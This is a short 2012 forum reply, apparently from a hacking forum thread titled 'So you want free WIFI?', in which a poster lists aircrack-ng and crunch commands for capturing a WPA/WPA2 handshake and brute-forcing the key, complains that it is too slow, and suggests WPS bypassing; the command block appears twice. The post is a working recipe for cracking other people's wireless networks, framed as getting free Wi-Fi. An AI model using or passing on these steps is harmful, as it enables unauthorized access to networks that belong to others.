RE: So you want free WIFI? WPA/WPA2 *incomplete 11-02-2012, 03:58 AM
#11
unfortunately mine hasn't. If I've read correctly, I have to do 4 steps:
1. airmon-ng start Wlan0
2. airodump-ng -w capture.cap --output-format pcap --channel X --encrypt WPA mon0
3. handshake
4. /pentest/passwords/crunch/crunch 7 14 abcdefghijklmonpqrstuvwxyzABCDEFGHIJKLMONPQRSTUWXYZ0123456789 -u | aircrack-ng -a 2 -b 00:00:00:00:00:00 -l file.txt -w- capture.cap
Right ?
I tried it and it's too long ... over 1 hour and didn't find a 14 char password without number, special char and caps. I really believe that a WPA2 key with caps, numbers and special char is impossible to crack (with dictionary and brute force attack).
Maybe WPS bypassing is better and faster...
1. airmon-ng start Wlan0
2. airodump-ng -w capture.cap --output-format pcap --channel X --encrypt WPA mon0
3. handshake
4. /pentest/passwords/crunch/crunch 7 14 abcdefghijklmonpqrstuvwxyzABCDEFGHIJKLMONPQRSTUWXYZ0123456789 -u | aircrack-ng -a 2 -b 00:00:00:00:00:00 -l file.txt -w- capture.cap
Right ?
I tried it and it's too long ... over 1 hour and didn't find a 14 char password without number, special char and caps. I really believe that a WPA2 key with caps, numbers and special char is impossible to crack (with dictionary and brute force attack).
Maybe WPS bypassing is better and faster...
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
thanks !